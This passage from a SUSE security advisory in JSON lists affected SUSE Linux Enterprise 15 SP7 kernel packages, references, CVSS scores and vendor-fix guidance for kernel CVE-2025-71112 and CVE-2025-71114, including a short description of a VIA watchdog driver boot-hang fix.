"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71112",
"url": "https://www.suse.com/security/cve/CVE-2025-71112"
},
{
"category": "external",
"summary": "SUSE Bug 1256726 for CVE-2025-71112",
"url": "https://bugzilla.suse.com/1256726"
},
{
"category": "external",
"summary": "SUSE Bug 1256727 for CVE-2025-71112",
"url": "https://bugzilla.suse.com/1256727"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "important"
}
],
"title": "CVE-2025-71112"
},
{
"cve": "CVE-2025-71114",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71114"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nvia_wdt: fix critical boot hang due to unnamed resource allocation\n\nThe VIA watchdog driver uses allocate_resource() to reserve a MMIO\nregion for the watchdog control register. However, the allocated\nresource was not given a name, which causes the kernel resource tree\nto contain an entry marked as \"\u003cBAD\u003e\" under /proc/iomem on x86\nplatforms.\n\nDuring boot, this unnamed resource can lead to a critical hang because\nsubsequent resource lookups and conflict checks fail to handle the\ninvalid entry properly.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71114",
"url": "https://www.suse.com/security/cve/CVE-2025-71114"
},
{
"category": "external",
"summary": "SUSE Bug 1256752 for CVE-2025-71114",
"url": "https://bugzilla.suse.com/1256752"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
